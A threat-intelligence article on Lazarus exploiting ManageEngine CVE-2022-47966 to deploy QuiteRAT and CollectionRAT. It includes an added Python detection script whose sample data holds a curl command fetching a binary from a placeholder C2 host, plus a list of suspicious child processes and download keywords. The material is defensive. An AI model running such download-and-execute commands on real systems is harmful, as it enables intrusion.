Lazarus Exploits ManageEngine to Deploy QuiteRAT

The North Korean state-sponsored Lazarus APT group has launched a new campaign targeting internet backbone infrastructure and healthcare organizations in Europe and the U.S. Cisco Talos reported that the attackers began by exploiting a vulnerability in ManageEngine ServiceDesk (CVE-2022-47966) as early as January, a mere five days after its disclosure.

Diving into details

  • Lazarus used the exploit to establish initial access; the vulnerable Java runtime process then immediately downloaded and ran a malicious binary, launching the implant on the compromised server.
  • This binary is a modified version of the group’s MagicRAT malware, dubbed QuiteRAT.
  • In this campaign the Lazarus Group has also introduced a new malware named CollectionRAT, a RAT capable of executing arbitrary commands on a compromised system.
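
A defender-side check for the initial-access step described above (a ManageEngine Java process spawning a downloader or shell), as an added example that is not from the article or from Cisco Talos: it classifies constructed Sysmon-style process-creation events. The ManageEngine install path, the event field names, the placeholder host and the list of flagged child processes are assumptions to adapt to your own telemetry.

```python
import re

# Assumption: ServiceDesk Plus runs its bundled JRE from under the
# ManageEngine install directory; adjust the pattern to your deployment.
MANAGEENGINE_JAVA = re.compile(r"\\ManageEngine\\.*\\java\.exe$", re.IGNORECASE)

# Children a Java web application has no business spawning after a request.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "certutil.exe", "curl.exe",
    "bitsadmin.exe", "mshta.exe", "rundll32.exe",
}
# Command-line fragments indicating the child fetches something remote.
DOWNLOAD_HINTS = re.compile(
    r"https?://|urlcache|downloadstring|downloadfile|invoke-webrequest", re.IGNORECASE
)


def classify(event):
    """Return 'download-and-execute', 'suspicious-child' or None for one event."""
    if not MANAGEENGINE_JAVA.search(event["ParentImage"]):
        return None  # parent is not the ManageEngine JRE: out of scope here
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    if child not in SUSPICIOUS_CHILDREN:
        return None
    if DOWNLOAD_HINTS.search(event["CommandLine"]):
        return "download-and-execute"
    return "suspicious-child"


def triage(events):
    """Return [(ProcessId, verdict)] for every event that is not benign."""
    return [(ev["ProcessId"], classify(ev)) for ev in events if classify(ev)]


# Constructed Sysmon-style process-creation events (not real telemetry).
ME_JAVA = r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": ME_JAVA, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl http://c2.example.invalid/q.bin -o C:\Temp\q.bin"},
    {"ProcessId": 4121, "ParentImage": ME_JAVA, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "conhost.exe 0xffffffff"},
    {"ProcessId": 4122, "ParentImage": ME_JAVA, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": 4123, "ParentImage": r"C:\Program Files\Java\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE_EVENTS):
        print(pid, verdict)
```

Feed real process-creation events with the same field names to `triage` and alert on any `download-and-execute` verdict; a `suspicious-child` hit is worth a look but may also be an administrator's legitimate action.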

Furthermore, security researchers were able to link CollectionRAT to Jupiter/EarlyRAT, a malware family previously associated with the Andariel APT faction, which operates under the umbrella of the Lazarus Group.

MagicRAT to QuiteRAT

Like MagicRAT, QuiteRAT is built on the Qt framework, an open-source, cross-platform framework for developing applications. It offers capabilities such as arbitrary command execution.

  • However, its file size is notably smaller, ranging from 4 to 5 MB, compared with MagicRAT’s 18 MB.
  • The analysis attributes this considerable size difference to the Lazarus Group’s decision to bundle only the essential Qt libraries into QuiteRAT, whereas MagicRAT embedded the entire Qt framework.
  • Although MagicRAT includes a persistence mechanism, configuring scheduled tasks, QuiteRAT has no built-in persistence. Instead, QuiteRAT relies on the C2 server to send it persistence instructions.

The bottom line

This marks the third publicly documented campaign attributed to the Lazarus Group in the early months of 2023, and, notably, the actor has reused the same infrastructure across these operations. Security teams are advised to track and analyze the threat for timely prevention of QuiteRAT infections.